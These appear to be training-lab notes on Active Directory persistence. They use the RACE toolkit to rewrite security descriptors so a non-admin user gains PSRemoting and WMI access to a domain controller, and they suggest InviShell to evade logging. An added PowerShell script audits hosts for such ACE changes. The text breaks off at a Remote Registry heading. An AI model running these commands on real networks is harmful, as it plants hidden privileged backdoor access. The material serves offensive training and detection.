It is possible to modify the security descriptor (SD) components, such as the owner, primary group, DACL and SACL, of multiple remote access methods (securable objects) to allow access to non-admin users.
Admin privileges are required to modify an SD.
ACLs can be modified to allow non-admin users to access securable objects.
PowerShell Remoting:
Use the RACE toolkit, via either PSRemoting or WMI
Using PSRemoting
# Using PSRemoting
# Run InviShell
# First, import the RACE toolkit:
. C:\AD\Tools\RACE-master\RACE.ps1
# On the local machine for student1, open an elevated cmd:
# This reads the existing ACL for the root namespace and DCOM and adds an entry for our SID.
Set-RemotePSRemoting -SamAccountName student1 -Verbose
# On remote machine for student1 without credentials:
Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Verbose
# Connect to dcorp-dc as student
Enter-PSSession -ComputerName dcorp-dc
# To remove the permissions on remote machine:
Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Remove
Using WMI
# OR Using WMI
Set-RemoteWMI -SamAccountName student1 -Verbose
# On remote machine for student1 without credentials:
Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose
# On remote machine with explicit credentials. Only root\cimv2 and nested namespaces:
Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -Credential Administrator -namespace 'root\cimv2' -Verbose
# On remote machine remove permissions:
Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Remove -Verbose
# Now we can run WMI queries on DC as student.
powershell
gwmi -class win32_operatingsystem -ComputerName dcorp-dc
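To check a host for the access the commands above grant, here is an added audit example (not part of RACE or of the original notes). It lists allow ACEs held by unexpected SIDs on the PSRemoting session configurations, and ACEs granting Remote Enable on root\cimv2. The $Expected baseline and the helper name Get-UnexpectedAce are assumptions; DCOM permissions are not covered.

```powershell
# Added audit example; Windows PowerShell 5.1, run elevated on the host being checked.
# $Expected is an assumed baseline of well-known SIDs; adjust it for your environment.
$Expected = @(
    'S-1-5-32-544',  # BUILTIN\Administrators
    'S-1-5-32-580',  # BUILTIN\Remote Management Users
    'S-1-5-4',       # NT AUTHORITY\INTERACTIVE
    'S-1-5-18'       # NT AUTHORITY\SYSTEM
)
$WbemRemoteAccess = 0x20   # "Remote Enable" right on a WMI namespace

# Hypothetical helper: emit allow ACEs held by SIDs outside the baseline.
# With -RequiredMask, only ACEs that include those access bits are considered.
function Get-UnexpectedAce {
    param(
        [string]$Target,
        [System.Security.AccessControl.RawSecurityDescriptor]$Descriptor,
        [int]$RequiredMask = 0
    )
    foreach ($ace in $Descriptor.DiscretionaryAcl) {
        if ($ace.AceQualifier -ne 'AccessAllowed') { continue }
        if ($RequiredMask -and -not ($ace.AccessMask -band $RequiredMask)) { continue }
        $sid = $ace.SecurityIdentifier
        if ($Expected -contains $sid.Value) { continue }
        $name = '<unresolved>'
        try { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value } catch { }
        [pscustomobject]@{
            Target     = $Target
            Sid        = $sid.Value
            Account    = $name
            AccessMask = '0x{0:X8}' -f $ace.AccessMask
        }
    }
}

# PSRemoting endpoints: each session configuration exposes its SD as SDDL.
foreach ($cfg in Get-PSSessionConfiguration) {
    if (-not $cfg.SecurityDescriptorSddl) { continue }
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor -ArgumentList $cfg.SecurityDescriptorSddl
    Get-UnexpectedAce -Target "PSRemoting:$($cfg.Name)" -Descriptor $sd
}

# WMI namespace: __SystemSecurity.GetSD returns the namespace SD in binary form.
$r = Invoke-WmiMethod -Namespace 'root\cimv2' -Path '__SystemSecurity=@' -Name GetSD
if ($r.ReturnValue -eq 0) {
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor -ArgumentList ([byte[]]$r.SD), 0
    Get-UnexpectedAce -Target 'WMI:root\cimv2' -Descriptor $sd -RequiredMask $WbemRemoteAccess
}
```

Pipe the output to Format-Table or Export-Csv and compare it against the same listing from a known-good host.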
Remote Registry:
Using RACE or DAMP, with admin privileges on the remote machine (make sure to run this first):